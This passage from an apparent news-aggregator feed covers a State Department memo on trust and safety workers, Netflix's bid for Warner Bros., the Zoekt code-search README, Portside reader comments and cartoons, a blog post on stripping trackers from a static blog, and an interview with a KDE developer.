"I'm alarmed that trust and safety work is being conflated with 'censorship'," said Alice Goguen Hunsberger, who has worked in trust and safety at tech companies including OpenAI and Grindr.

"Trust and safety is a broad practice which includes critical and life-saving work to protect children and stop CSAM [child sexual abuse material], as well as preventing fraud, scams, and sextortion. T&S workers are focused on making the internet a safer and better place, not censoring just for the sake of it," she said. "Bad actors that target Americans come from all over the world and it's so important to have people who understand different languages and cultures on trust and safety teams — having global workers at tech companies in [trust and safety] absolutely keeps Americans safer."

In a statement, a State Department spokesperson who declined to give their name said the department does not comment on "allegedly leaked documents," but added: "the Administration has made clear that it defends Americans' freedom of expression against foreigners who wish to censor them. We do not support aliens coming to the United States to work as censors muzzling Americans."

The statement continued: "In the past, the President himself was the victim of this kind of abuse when social media companies locked his accounts. He does not want other Americans to suffer this way. Allowing foreigners to lead this type of censorship would both insult and injure the American people."

First Amendment experts criticized the memo's guidance as itself a potential violation of free speech rights.

"People who study misinformation and work on content-moderation teams aren't engaged in 'censorship'— they're engaged in activities that the First Amendment was designed to protect. This policy is incoherent and unconstitutional," said Carrie DeCell, senior staff attorney and legislative advisor at the Knight First Amendment Institute at Columbia University, in a statement.

Even as the administration has targeted those it claims are engaged in censoring Americans, it has also tightened its own scrutiny of visa applicants' online speech .

On Wednesday, the State Department announced it would require H-1B visa applicants and their dependents to set their social media profiles to "public" so they can be reviewed by U.S. officials.

NPR's Bobby Allyn and Michele Kelemen contributed reporting.

Netflix in exclusive talks to buy HBO

Hacker News
www.cnn.com
2025-12-05 04:36:42
Comments...
Original Article

Netflix has submitted the highest bid to date for Warner Bros. Discovery’s studio and streaming assets, according to people familiar with the secretive bidding process.

Netflix’s most recent offer, submitted on Thursday, valued the Warner Bros. studio, HBO Max streaming service and related parts of the company at around $28 per share, sources said.

Paramount also submitted a new bid on Thursday, closer to $27 per share, one of the sources added.

The two offers aren’t apples-to-apples, however, because Paramount has been trying to buy all of Warner Bros. Discovery, including CNN and other cable channels, while Netflix and another bidder, Comcast, have only shown interest in the studio and streaming assets.

The mega-media bidding war has intensified in recent days, captivating a wide swath of Hollywood and garnering attention from the Trump White House. Iconic brands like HBO and DC Comics hang in the balance.

Representatives for the companies involved have declined to comment. But leaks out of what is supposed to be a confidential process suggest that Netflix now has the pole position.

Paramount certainly perceives it that way; the company’s attorneys wrote to Zaslav expressing “grave concerns” about the auction process.

Specifically, Paramount’s attorneys charged that WBD has “embarked on a myopic process with a predetermined outcome that favors a single bidder,” meaning Netflix.

Analysts said the letter could be a precursor to a hostile-takeover play by Paramount, which has moved aggressively in recent months under new CEO David Ellison’s leadership.

Late Thursday, Bloomberg reported that WBD and Netflix have entered exclusive talks.

Ellison kickstarted the auction process earlier in the fall by submitting multiple bids to WBD CEO David Zaslav and the company’s board.

Analysts at the time predicted that a bidding war would break out, and that’s exactly what has happened, given that famed movie and TV studios rarely come onto the market.

Zaslav officially put up the for-sale sign in October. At the same time, he said that WBD’s previously announced plan to split the company into two publicly traded halves would continue to be pursued.

The WBD board had been under pressure to do something, since the company’s stock plummeted after it was formed through a 2022 merger, from roughly $25 a share to a low of $7.52.

The split plan helped to rejuvenate WBD’s shares earlier this year, and then word of Paramount’s offers sent the stock skyrocketing back toward $25.

Sources in Ellison’s camp have emphasized that Paramount would be disciplined in its pursuit of the Warner assets.

Meanwhile, people in Zaslav’s camp have argued that the proposed split was the best way to realize the value of all of WBD.

If the split still takes effect next year, the Warner Bros. half would house HBO Max and the movie studio, and the Discovery Global half would house CNN and other cable channels.

Paramount may have been trying to get ahead of the split by making unsolicited bids for the whole company.

Ellison’s pursuit is audacious, to be sure: Paramount’s market cap is currently one-fourth the size of WBD’s market cap.

But Ellison and his management team have been moving fast to revitalize Paramount and disprove skeptics across Hollywood.

It’s impossible to make sense of the WBD bidding war without understanding the “Trump card.”

Ellison and Paramount are perceived to have a mutually beneficial relationship with President Trump and the White House — and thus an advantage in getting any deal approved by the Trump administration. “That’s the Trump card,” an Ellison adviser remarked to CNN in October.

Past administrations proudly insisted that agencies like the Department of Justice, which enforces antitrust law, were independent of the president. Trump has replaced those norms with a new, overtly transactional approach.

Trump has repeatedly praised Ellison and his father Larry, Oracle’s executive chairman, who is a key player in Trump’s dealings with TikTok.

“They’re friends of mine. They’re big supporters of mine,” the president said in mid-October.

Numerous Republican lawmakers have also cheered the Ellison takeover of CBS and the rest of Paramount, especially the installation of Bari Weiss as editor in chief of CBS News.

Ellison has been both credited and criticized for forging a relationship with Trump’s inner circle this year despite donating nearly $1 million to Joe Biden’s reelection campaign last year.

Just a couple of weeks ago, Ellison landed an invitation to Trump’s White House dinner for Saudi Crown Prince Mohammed bin Salman.

What some have seen as savvy business practices, others have seen as media capitulation. And Ellison has stayed mostly quiet about the matter.

On Wednesday he was scheduled to appear at the DealBook Summit, an annual conference hosted by The New York Times in Manhattan. But he withdrew from the summit amid the negotiations with WBD and was later spotted back in Washington, D.C. for talks with officials there.

During the WBD bidding process, Paramount executives have bluntly argued that their offer will pass muster with Trump administration regulators while rival offers will not.

After all, any proposed sale could be held up for months, and even years, in Washington, either by Trump loyalists carrying out his wishes or by bureaucrats with genuine objections to media consolidation.

But Trump does not get a literal veto. When the Justice Department in 2017 sued to stop AT&T’s merger with Time Warner, a forerunner to WBD, the companies fought the case in court and prevailed.

Some Wall Street analysts have asserted that Netflix may be willing to stomach a similar legal battle.

Plus, Washington is not the only regulatory battleground that media companies have to worry about.

A WBD sale, in whole or in part, would face scrutiny in the United Kingdom, the European Union and some Latin American countries. Sources previously told CNN that the perception of Trump clearing the way for the Ellisons in the US could hurt them in other markets.

Media reports about Netflix emerging as the frontrunner for WBD’s studio and streaming assets have prompted some Republican elected officials to raise alarms about the prospective combination.

“Learning about Netflix’s ambition to buy its real competitive threat — WBD’s streaming business — should send alarm to antitrust enforcers around the world,” Sen. Mike Lee wrote on X. “This potential transaction, if it were to materialize, would raise serious competition questions — perhaps more so than any transaction I’ve seen in about a decade.”

A recent Bank of America analyst report put it this way: “If Netflix acquires Warner Bros., the streaming wars are effectively over. Netflix would become the undisputed global powerhouse of Hollywood beyond even its currently lofty position.”

Rats Snatching Bats Out of the Air and Eating Them–Researchers Got It on Video

Hacker News
www.smithsonianmag.com
2025-12-05 04:26:10
Comments...

Fast trigram based code search

Hacker News
github.com
2025-12-05 04:00:28
Comments...
Original Article

Zoekt: fast code search

"Zoekt, en gij zult spinazie eten" - Jan Eertink

("seek, and ye shall eat spinach" - My primary school teacher)

Zoekt is a text search engine intended for use with source code. (Pronunciation: roughly as you would pronounce "zooked" in English)

Note: This has been the maintained source for Zoekt since 2017, when it was forked from the original repository github.com/google/zoekt .

Background

Zoekt supports fast substring and regexp matching on source code, with a rich query language that includes boolean operators (and, or, not). It can search individual repositories, and search across many repositories in a large codebase. Zoekt ranks search results using a combination of code-related signals like whether the match is on a symbol. Because of its general design based on trigram indexing and syntactic parsing, it works well for a variety of programming languages.

The two main ways to use the project are

  • Through individual commands, to index repositories and perform searches through Zoekt's query language
  • Or, through the indexserver and webserver, which support syncing repositories from a code host and searching them through a web UI or API

For more details on Zoekt's design, see the docs directory .

Usage

Installation

go get github.com/sourcegraph/zoekt/

Note : It is also recommended to install Universal ctags , as symbol information is a key signal in ranking search results. See ctags.md for more information.

Command-based usage

Zoekt supports indexing and searching repositories on the command line. This is most helpful for simple local usage, or for testing and development.

Indexing a local git repo

go install github.com/sourcegraph/zoekt/cmd/zoekt-git-index
$GOPATH/bin/zoekt-git-index -index ~/.zoekt /path/to/repo

Indexing a local directory (not git-specific)

go install github.com/sourcegraph/zoekt/cmd/zoekt-index
$GOPATH/bin/zoekt-index -index ~/.zoekt /path/to/repo

Searching an index

go install github.com/sourcegraph/zoekt/cmd/zoekt
$GOPATH/bin/zoekt 'hello'
$GOPATH/bin/zoekt 'hello file:README'

Zoekt services

Zoekt also contains an index server and web server to support larger-scale indexing and searching of remote repositories. The index server can be configured to periodically fetch and reindex repositories from a code host. The webserver can be configured to serve search results through a web UI or API.

Indexing a GitHub organization

go install github.com/sourcegraph/zoekt/cmd/zoekt-indexserver

echo YOUR_GITHUB_TOKEN_HERE > token.txt
echo '[{"GitHubOrg": "apache", "CredentialPath": "token.txt"}]' > config.json

$GOPATH/bin/zoekt-indexserver -mirror_config config.json -data_dir ~/.zoekt/ 

This will fetch all repos under 'github.com/apache', then index the repositories. The indexserver takes care of periodically fetching and indexing new data, and cleaning up logfiles. See config.go for more details on this configuration.

Starting the web server

go install github.com/sourcegraph/zoekt/cmd/zoekt-webserver
$GOPATH/bin/zoekt-webserver -index ~/.zoekt/

This will start a web server with a simple search UI at http://localhost:6070 . See the query syntax docs for more details on the query language.

If you start the web server with -rpc , it exposes a simple JSON search API at http://localhost:6070/api/search .

The JSON API supports advanced features including:

  • Streaming search results (using the FlushWallTime option)
  • Alternative BM25 scoring (using the UseBM25Scoring option)
  • Context lines around matches (using the NumContextLines option)

Finally, the web server exposes a gRPC API that supports structured query objects and advanced search options.

Acknowledgements

Thanks to Han-Wen Nienhuys for creating Zoekt. Thanks to Alexander Neubeck for coming up with this idea, and helping Han-Wen Nienhuys flesh it out.

Tidbits-Dec. 4-Reader Comments: No War on Venezuela; Hegseth Murder in the Caribbean; Mass Deportation Is NOT Deportation; Everyone Is Talking About Affordability; Peace in Ukraine & Peace in Europe; New Unreleased Song by John Lennon; Lots More…

Portside
portside.org
2025-12-05 03:48:09
Tidbits-Dec. 4-Reader Comments: No War on Venezuela; Hegseth Murder in the Caribbean; Mass Deportation Is NOT Deportation; Everyone Is Talking About Affordability; Peace in Ukraine & Peace in Europe; New Unreleased Song by John Lennon; Lots More… jay Thu, 12/04/2025 - 22:48 ...
Original Article



Dr. James MacLeod
December 4, 2025
MacLeodCartoons

Re: Opinion: Everyone Is Talking About Affordability — and Making the Same Mistake

Discussion of outlawing stock buybacks that were once illegal would be a crucial way to address the wage issue.

Given the corruption of our lawmakers this has a very long shot of being realized but like Medicare for All it is a crucial demand to raise and tie to the problem of depressed wages.

Jessica Benjamin



Students attending school in the winter, mostly in the Midwest or the East Coast, get a Snow Day if a heavy snowstorm blankets their town then school will be canceled and kids can play all day. In Los Angeles, students have been not going to school out of fear of being terrorized and kidnapped by our own government. You can keep ICE Day.

Lalo's cartoon archive can be seen here.

Lalo Alcaraz
December 3, 2025
CALÓ NEWS

Re: Amber Czech Was Murdered at Work. Tradeswomen Say It Could Have Happened to Any of Them.

This is horrible;  I was a shop steward for 35 years in the carpenters union local 157 NYC.

We take a harassment class and get certified among a dozen other certifications.

None of this only happens on non union jobs.

No woman is harassed on any of my jobs let alone killed?

Harassment of women is on the rise and maybe it is because a rapist is in the White House?

You can’t just look the other way, if you do you are an enabler.

There are so many things the public see and turns a blind eye to!!!

Humans are tribal and we have good tribes and bad it is your choice.

You can’t stand and listen to the president call a woman reporter “Piggie’ and not call him out on the spot.

Stupid and arrogant not very good qualities in the most powerful job in the world.

My union is the only place where women get paid the same pay as the men.

Speak up not after the fact.

Manipulation is rampant.

John Campo



Given that Trump is now pardoning drug traffickers—and we’ve watched him hand out clemency and favors to people who bought into his latest crypto grift—it’s becoming pretty clear that these so-called traffickers have one guaranteed way to avoid being targeted: buy what Trump is selling.

Nick Anderson
December 1, 2025
Pen Strokes

Re: Palestinians Offer a Much Clearer Path to Peace

"International law also requires adhering to the International Court of Justice advisory opinion in July 2024, which ruled that the entire occupation of Palestinian territories is illegal and must end. That would mean insisting that Israel withdraw from sovereign Palestinian territory, as the international force moves in for the transition to Palestinian governance. An international force, from the Palestinian perspective, is welcome under those terms – a whole chapter in the Palestinian Armistice plan is devoted to the issue."

Bill Rogers
Posted on Portside's Facebook page

Re: Peace in Ukraine – Peace in Europe

The Party of the European Left has condemned Russia’s military aggression against Ukraine as a violation of international law and denial of Ukraine’s sovereignty. However the EL has not aligned itself with NATO whose objective has been to end the war through military means. The ongoing war in Ukraine has claimed hundreds of thousands of lives, destroyed hundreds of towns and villages, and forced millions of people to flee. The danger of escalation into a general war between Russia and NATO persists and continues to grow. The EL stresses once more that all political and diplomatic initiatives aimed at achieving a ceasefire, bringing the war to a lasting and durable end, and preventing any further escalation must be taken, strengthened, and implemented immediately. Our solidarity can only be with the victims—the soldiers, civilians, refugees, and conscientious objectors on both sides—and not with the imperialist interests that fuel the conflict.

John Gilbert
Posted on Portside's Facebook page

Re: To Win Radical Success, Mamdani Understands, Is To Know When and Where To Compromise

I would call it building a coalition around central shared goals.  In the past it has too often been a move to the so-called center, which has been to capitulate to corporate Dems and to soft-pedal imperialist atrocities, abandoning the interest of working people in the process.  If the goals remain true to achieving affordability and dignity for ordinary working people of all races and religions, then let's give it a try. There are lots of good people out there.  We may have differences about exactly how to achieve our goals, but so many have ideas and experience that can help build a brand new plan, an effective plan that has never existed before.

Sonia Cobbins
Posted on Portside's Facebook page

Con Job President  --  Cartoon and Commentary by Clay Jones

Are you going to believe your lying wallet or your lying president?



When Donald Trump became president in 2016, he was fortunate that he was inheriting President Barack Obama's economy. It was such a strong economy he inherited that it took him almost 4 years to fuck it up. Although throughout those four years, Trump took credit for the economy that the Black man created for him. What was really messed up is that in 2024, voters forgot who created that economy, and they restored Donald Trump back into the presidency, believing he had something to do with it. Not only did voters forget that Donald Trump had nothing to do with creating a great economy, but they also forgot that he ruined President Obama's great economy and left office in 2020 with the biggest. loss of jobs since Hoover.

In 2020, Trump ran against Biden's economy, which most people felt was not strong enough. Since Trump has returned to office, the economy has gotten worse. While he claims Biden's inflation at the time he came into office was bad, that has gotten worse, too since he's been in charge. Voters are starting to figure out that Trump has no idea how to build an economy. What might be freaking Trump out is that he might be realizing it, too.

Donald Trump knows how to rage-tweet while sitting on the toilet at 3 AM. Managing the largest economy in the world, not so much.

A recent Fox News poll found that 76% of voters view the economy negatively. Another poll by the Economist and YouGov finds that 58% disapprove of the job Trump is doing. Trump's polls on the economy are worse than Biden's were.

Even Trump must realize that since he is lifting all tariffs on commodities like coffee, meat, and other foods. I guess we are supposed to forget his belief that tariffs don't raise prices, which is hard to argue while tariffs are raising prices. TACO indeed.

But Trump is becoming frustrated with the public for not appreciating the job he sucks at. During a cabinet meeting yesterday, Trump declared that affordability “doesn’t mean anything to anybody.” I'm sure it means something to all those congressional Republicans retiring before the midterms.

Trump called the issue of affordability a “fake narrative” and “con job” created by Democrats to dupe the public.

He said, “They just say the word. It doesn’t mean anything to anybody. They just say it — affordability. I inherited the worst inflation in history. There was no affordability. Nobody could afford anything.”

Of course, Trump, along with voters, forgets that President Biden inherited Trump's economy in 2020. The difference between Trump and Biden inheriting bad economies is that Biden fixed the one he got.

Republicans left bad economies for presidents Clinton, Obama, and Biden. And those presidents fixed them. Republicans are great at trashing economies, while Democrats are great at repairing them.

Donald Trump was calling himself the “affordability president,” but he's really only affordable for the people who bribe him, like crypto moguls and Saudi royalty. Democrats are going to be running a lot of commercials with Trump's affordability/con job comment.

I just hope the economy isn't trashed beyond repair by the time a Democrat is elected to repair the damage Trump has done to it.


Clay Jones
December 3, 2025
Claytoonz

Watching Rainbows  --  Unreleased song by John Lennon


Mr. Fish
MR. FISH’S CATCH OF THE DAY
December 4, 2025
The Independent Ink


Your MR. FISH’S CATCH OF THE DAY for Tuesday, December 4, 2025, is an unreleased Beatles song that I’ve been listening to for 40 years. It’s called Watching Rainbows and was recorded in 1969 during the Let it Be sessions as an improvised Lennon throwaway. Remarkably, it was not included in Peter Jackson’s documentary miniseries, Get Back, nor was it included on any of the Anthology releases. Here are the lyrics, most likely invented by Lennon on the spot:

Standing in the garden waiting for the sun to shine
With my umbrella with its head I wish it was mine
Everybody knows…
Instead of watching rainbows I’m gonna make me some
I said I’m watching rainbows I’m gonna make me some

Standing in the garden waiting for the English sun to come and make me brown so I can be someone
Looking at the bench of next door neighbors
Crying, I said c’mon, I said, save us
Everybody’s got to have something hard to hold
Well, instead of watching rainbows under the sun
You gotta get out son and make you one
You gotta get out son and make your own
Because you’re ain’t gonna make it if you don’t

Shoot me
Shoot me
Whatever you do you gotta kill somebody to get what you wanna get
You gotta shoot me
You gotta shoot me

Please shoot me

Even before the Now and Then single was released in 2023 and announced as the “last Beatles song,” I thought Rainbows should be stitched together with McCartney’s Pillow for Your Head and Harrison’s Mother Divine , both incomplete compositions from the same time period, and released as a B-side medley to a re-release of the medley that closed out Abby Road . The connecting tissue for Divine Rainbow Pillow could be composed by the two surviving members of the band, of course. In other words, now that we’ve all heard Now and Then and had our hearts broken by its mediocre production and flabby, uninspired demeanor, I can’t be alone in wishing there was a better swan song for the group! (Additionally, I have no fewer than 10 solo Lennon tracks that he recorded in the late 70s that all would’ve been better to riff off of for a “last” Beatles song— anything other than Now and Then , but I’ll save those for a later post - ha!)

Here are the tracks. Dig it.

WATCHING RAINBOWS

PILLOW FOR YOUR HEAD

MOTHER DIVINE


THE INDEPENDENT INK is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.


Mon, Dec 8 ⸱ 2-3pm ET • 1-2pm CT • Noon-1pm MT • 11am-Noon PT

Virtual Event ⸱ Zoom link shared after registration

Join Movement Voter PAC for our final briefing of the year – more of a “fireside chat” with movement leaders! – to celebrate our successes in 2025 and look ahead to 2026.

RSVP

Speakers:

  • Billy Wimsatt, Movement Voter PAC
  • LaTosha Brown, Black Voters Matter Fund
  • Ai-Jen Poo, Care in Action
  • Doran Schrantz, State Power Action Fund

Notes:

  • This call is open to the public.
  • We will record this briefing and send it to all who register.
  • After the briefing, you are welcome to join an optional 30-minute informal Q&A.
  • This is a partisan, political event. We invite our 501(c)(3) supporters and partners to attend in their personal capacity. Please consult your organization's legal counsel with any questions.


About Movement Voter PAC

MVP funds local organizing and movement-building groups working to shift culture, win power, and shape policy.

We just put out our 2025 reca p  — if you haven’t yet, check it out to see the incredible work MVP partners did this year to push for policy progress, turn back the tide of authoritarianism, and win the biggest elections of the year.

MVP operates like a “mutual fund” for political giving: We raise money from donors, then channel it toward the most impactful organizations and power-building work around the country.

We do the research so you don’t have to, streamlining your giving and maximizing your impact by investing in the most effective organizations and innovative strategies. (Bonus: You get to hit "unsubscribe" on all the political fundraising spam in your inbox!)

Movement Voter Project
37 Bridge Street, Box 749
Northampton, MA 01060

For all news and media inquiries, email press@movement.vote.

Warner Bros Begins Exclusive Deal Talks With Netflix

Hacker News
www.bloomberg.com
2025-12-05 03:44:12
Comments...
Original Article

We've detected unusual activity from your computer network

To continue, please click the box below to let us know you're not a robot.

Why did this happen?

Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy .

Need Help?

For inquiries related to this message please contact our support team and provide the reference ID below.

Block reference ID:c063c4c9-d1ab-11f0-8b29-ea5f109eb97b

Get the most important global markets news at your fingertips with a Bloomberg.com subscription.

SUBSCRIBE NOW

Blogging in 2025: Screaming into the Void

Hacker News
askmike.org
2025-12-05 02:55:34
Comments...
Original Article

Posted at December 04, 2025

Before social media became what it is today I used to blog a lot. And I wasn't the only one, many people did. There was this idea of a decentralized and open web: everyone had their own little space on the web (with a selfhosted blog, or a platform like wordpress or blogger).

The internet looks very different now. People consume (and produce) more on the internet than ever before, but almost all content lives on these big social media platforms designed to keep everything and everyone inside. It feels like the web is shrinking.

There seems to be some resurgence into the old web now, time will tell if it gains any real ground. It's an uphill battle: Besides most online eyeballs now being glued to social media apps, we're seeing AI take over the way people interact with the internet altogether. Back in the old days if you wanted to know more about something you'd google the term and start going through the websites Google said are most relevant. Now AI is a lot more efficient in getting you the answer to whatever you want to know in front of you in real time. If the answer was on a forum, blog or any other website the AI will fetch it behind the scenes and summarize it for you. From a UX perspective this is the obvious direction things will continue to go.

A second problem is that of quality: people who put a lot of time in their content (and are very good writers) can now more easily get paid for their work, through paid email newsletters and paywalled websites. All of their content doesn't live on the open web anymore (but at least there are no ads here). This is probably a win for writers, as well as the quality of the overall content being produced (and read) globally, but it's a loss for the open web.

So if you have a blog nowadays with all kinds of useful information (ignoring the discoverability as well as whether other people actually find it useful), how many people are really going to read it directly? Should you still put time into designing your blog and writing good articles?

Fighting fire ( AI ) with fire ( AI )

Regardless of all of this, I feel a (nostalgic) desire to blog again. I used to keep two blogs: this techblog you are reading now and a travel/picture blog called mijnrealiteit . Whenever I get this feeling, I start with updating the blog software: Throughout the years both blogs have gone through different iterations: from custom CMS systems, to WordPress instances with custom themes, to ending up with simple statically generated websites. You can find some historical posts here .

So towards an AI coding tool I turn, which have the power to write/change hundreds of lines of code in seconds with a simple one sentence instruction. AI coding tools are a widely debated topic in programming circles. They can clearly write a lot of code very quickly, and in my experience there are definitely cases where the speed/quality outpaces what a human developer can do. But there are also many cases where it writes junk (called slop) and does things that make no sense.

I actually wanted to do the very opposite of what "vibe coders" typically use AI tools for: instead of providing a simple (and vague) instruction to let the AI go crazy and build a new blog from scratch, I used it to strip/simplify my existing blog software towards the open web hygiene I value:

  • Remove all external javascript (visitor trackers, etc)
  • Remove other third party dependencies as well, like fonts loaded from Google
  • Make the HTML / CSS structure "minimal" and dead simple, with a design that works well on mobile and desktop
  • Migrate away from the unfortunately unmaintained static site generation framework WinterSmith , instead use a super simple script that just generates all pages inline.

You can find the code for mijnrealiteit on github , I'll publish the code for this blog soon as well.

It's all live now, as well as super minimal "about me" site on mvr.com . So I can get back to blogging! Will anyone actually read anything I post? I won't know since I removed all trackers. So for now I am screaming into the void.

Lobsters Interview with Aks

Lobsters
lobste.rs
2025-12-05 02:41:30
I know @Aks from IRC. He works on KDE Software, has made many lovely games and I even use his colorscheme in my terminal! Please introduce yourself! I'm Akseli but I usually go as Aks on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up...
Original Article

I know @Aks from IRC. He works on KDE Software, has made many lovely games and I even use his colorscheme in my terminal!

Please introduce yourself!

I'm Akseli but I usually go as Aks on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up doing computer stuff as a day job. Nowadays I work on KDE software at TechPaladin.

How did you first discover computers as a kid?

I was 3-4 years old. We had an old 386 DOS computer and I usually played games like Stunts on it. I was always behind when it came to hardware. While all my peers at school would have PS2s, I played on NES and PS1. Over time I just liked to play and tinker with different kinds of machines, mostly old left-over computers. But games were my main hook, I always wanted to make my own. And I did !

What were your first games like?

My very first game was with FPS Creator when I was ~13. My friend and I had some inside joke about a game with tons of enemies and a gun with 6 bullets, so I ended up recreating that. The game is really bad , but that was sort of the point. The next game I made when I was 18 or so, with Unity. Similar theme, but this time the enemies were dancing and bouncing skeletons, and you had a shotgun. It was so silly. I then made a roguelike, and 3D platformer, and FPS called Penance that has about 19k downloads. You can find my games on Itch. Lately though, I haven't had the energy to finish my game projects e.g. Artificial Rage: https://codeberg.org/akselmo/Artificial-Rage

I sank a fair few hours into Penance! I also really liked the Christmas game you made your sister. Do you ever put Easter eggs in code or often make projects for others like that?

I put some Easter eggs. For example someone complained that in Penance all the weapons look like woolen socks(?). So I added a pair of wooly socks in the starting area. I also proposed to my wife with a game, which had a small hallway with pictures of us. It was a fun little project, but a bit cut short since I tried to work on it as a secret, which proved difficult! We have made a few games together. She went to a web-dev bootcamp but doesn't code anymore, although she gladly works with me on various game projects.

How do you ideate the game play, style and such things?

While playing, I usually think it "would be cool if I had this game but changed this and that.." which provides a great starting point. Then it just naturally evolves into it's own thing. Penance was pretty much me going "I want Quake but with random generated levels" but then I ended up making a campaign with handcrafted levels to it anyway, beside the random generated endless mode.

Really, I just make things I want to play. People liking it is just a bonus. One of my favorite game projects is Castle Rodok because it is full of lore about my own RPG world. It's not very popular, but I like it a lot. It was a passion project.

What languages and technologies did you use?

With tools, I'm driven by need more than wants. My day job is all C++, which I'm fine with. I am very much a fan of "C-style" languages. They're boring and get the job done. For things I want to get running quick, I usually use Python, which I used a lot in test automation for all kinds of devices. Mostly medical devices so I can't talk about them due to NDAs.

Most of my games have been in Unity, but Crypt of Darne uses Python and I also have played around with C and Odin for my game projects.

I have tried LISPs and functional programming languages and such, but I just have hard time with them. Especially with those that propose a completely different syntax for me. I haven't had any projects with Rust but I liked tinkering with it it, besides the ' lifetime syntax which I easily miss. I am very boring when it comes to programming languages, I like to stick with what I know. I wanderlust about what I can create: Games, apps, systems software, drivers... Many ideas but hardly any time. But work comes first, so I mostly work on KDE things right now. For my own things, If I feel like working on a game, I go with the flow and do that.

What was your experience with different OS before finding KDE ?

I'd wanted to move on from Windows and dabbled with Linux a bunch, but could never stick to it because I could not play any games I owned in Linux. When I learned that Linux systems can in-fact game, it didn't take me long to switch. At first, I just dual-booted and tested the waters. I tried Linux Mint and Ubuntu, which were fine, but I had some issues with X11 and it's compositing eating all the FPS, so I gave up for a while. 6 months later I tried Kubuntu which worked really well for my needs. After some time I hopped to Fedora KDE, and there I found out that Wayland completely removed the issue with the compositing eating FPS in games. KDE was also very easy to learn and understand. I didn't really need to customize it. Then I found an annoying bug I wanted to fix it and started to contribute.

What was the first contribution experience like?

I had no idea how to do anything with C++. I learned C from scratch making Artificial Rage , studying how to create a project with CMake and all that, but luckily the internet is full of advice. So I had not used C++ before and just started learning to make that first contribution! I just joined the Matrix chats and asked questions; people were very helpful. Onboarding was great. It wasn't very big though, I just looked at the surrounding code and made my contribution look the part. Feedback in the merge request on Gitlab helped wrap it up. One of my first larger contributions though was adding region and language settings to system settings. This allowed users to change, for example, date-time settings differently than currency. This was mix of C and C++ and was difficult! Diligently reading the docs, looking at similar code and a lot of build->test->change->build again... it started to work! Then the reviews helped too. But C++ is such a different beast, I'm still learning it to this day. I'd say I know less C++ and more about problem solving.

It also helps that the "Qt dialect" of C++ is rather nice. The Qt framework does a lot of the work for you. For example, the signal and slot system or objects having parent objects that clear their children when they're deconstructed. Qt's documentation is also pretty great.

I'm still learning and don't have much in depth knowledge, but I hate header files. Modifying the same thing (function declarations) in two places makes no sense. It should autogenerate as part of the compilation. I found some such header generating tools, but they go unused and quietly forgotten. I suspect they would confuse language servers too, so it's a tooling issue.

What are your thoughts on Linux over all, big things which need changing but no one is working on or nice initiatives which you think will improve things, etc.?

The Linux desktop is getting much, much better and I see a hopeful future. Will it ever be the main OS, like Windows is? Probably not, unless hardware manufacturers/OEM's start installing Linux distros by default, instead of Windows. But I'm hopeful we'll get to 5%-10% worldwide usage. Now that gaming is possible on Linux, a lot of people moved over. Just few weeks ago I installed Bazzite for my friend who has been using Windows forever, but didn't want to use Win11.

Our next step is to make sure accessibility is up to snuff. At least for KDE, we have an accessibility engineer who is brilliant at their job. Then, I think immutable systems might get more popular. Personally I'm fine with either, but for those who view their computer more as an appliance than a computer, immutable systems are very nice: They allow them to jump from broken state back to working state with ease (select different boot entry at startup).

Complex software's never done; improvements are always needed. Accessibility means more than just accessibility settings: Make it easy to install, test, run, etc... If Linux desktops can get more hardware manufacturers on board to install Linux desktop as default, that will certainly help too. Also shoutout to the [EndOf10]( https://endof10.org/ initiative, when I shared it around to my non-nerdy-friends, they were very curious about Linux desktop and I had an excuse to ramble about it to them! In a nutshell: I am hopeful, but we can't rest on our laurels, we need to stop fighting "whats the best desktop" and work together more.

BTW, if anyone reading this has been Linux curious, go for it! Take a secondary device and play around with it there. And I also want to point out that dont be afraid to contribute to things you like in any way you can, be it software or hardware or actual physical world.

How do you see it in light of more phone usage, less desktop usage? Have you any impressions of governments or businesses moving to linux?

Computers are still widely used where I live, at least within my generation. Those who game especially often have a desktop PC. It may not be top-of-the-line hardcore gaming rig, but they have one to play a bit of Counter-Strike or similar games.

Phones are the king of "basic stuff" and for many people a tablet functions as a simple internet-appliance. I can only hope that projects like [PostmarketOS]( https://postmarketos.org/ will help to keep these tablets and phones working when the regular android updates stop, to ease the avalanche of e-waste.

When it comes to governments and businesses, I wish they did it more. I have heard that in Germany more governments are testing it out. In Finland, I do not know, but I would like to drive more for it. It's certainly an area where we should try to help as much as possible as well.

How can we (individuals or organizations) help?

Individual users: Make sure to report bugs and issues, and share knowledge. Do not evangelize or push the matter, just say it's something you use and elaborate when people ask. Too many times I've seen people pushed away from using Linux desktop because people are very.. Pushy. As surprising it may be, not many people really care as much as we do!

Organizations: Try to adopt more FOSS technologies for daily things, e.g. LibreOffice. Start small. It does not need to be an overnight change, just small things here and there.

How many resources do you have compared to the demands of everything you are working on?

We're definitely stretched. We always could use more help, though C++ seems to deter that help a bit, which I can understand. But if I could start from scratch, I'm sure anyone can! Besides, more and more projects use QML and Rust. For testing, there's Python.

What prerequisites are there for contributing?

We have Matrix chat for new contributors, where people can ask questions (and answering questions there is also a way to contribute.) All of it is documented . When triaging, I am trying to more often tag bugs in bugzilla as "junior jobs" to make things more approachable. Mentoring etc. is a community effort, and those who are willing to learn will receive help, though we're all rather busy so we hope people put some effort into trying to learn things too, of course.

How could bug reporting be improved?

I think we could half-automate bug reports, to make things easier: Gather basic information and ask basic questions upfront, without needing to open a web browser. For crash reports, we use a tool called DrKonqi : When app crashes, it gathers backtraces etc. automagically and allows the user to type what happened in a field. Something similar for regular ol' bugs would be great. Games do this with taking screenshots and logs when player opens the bug-report tool. But someone would still have to go through them, which is also an excellent way for anyone to contribute: Go through some bug reports, see if you can reproduce them or not, and report back to it with your system information. Anyone can do it, it's not a difficult job, just a bit tedious, especially when there's thousands of bug reports and 10 people going through them.

How do you approach problem solving?

Depends on the problem! If a bug causes a crash, a backtrace is usually helpful. If not, I go with trusty print-debugging to see exactly where things start acting weird. I like to approach it from many different angles at same time:

  • Sometimes I try to fix the bug to figure it out: Why does a given change fix the bug? The fix may not be the correct fix yet.
  • Of course, a well written bugreport with good reproduction steps helps a lot!
  • git blame is a good friend, asking people who implemented things can really help. But sometimes I work on code where it just says "moved to git in 2013" and the original code's from the 90s.
  • Talking to other people
  • Writing notes down as you try to understand the bug

Anything that pokes your brain in multiple different directions.

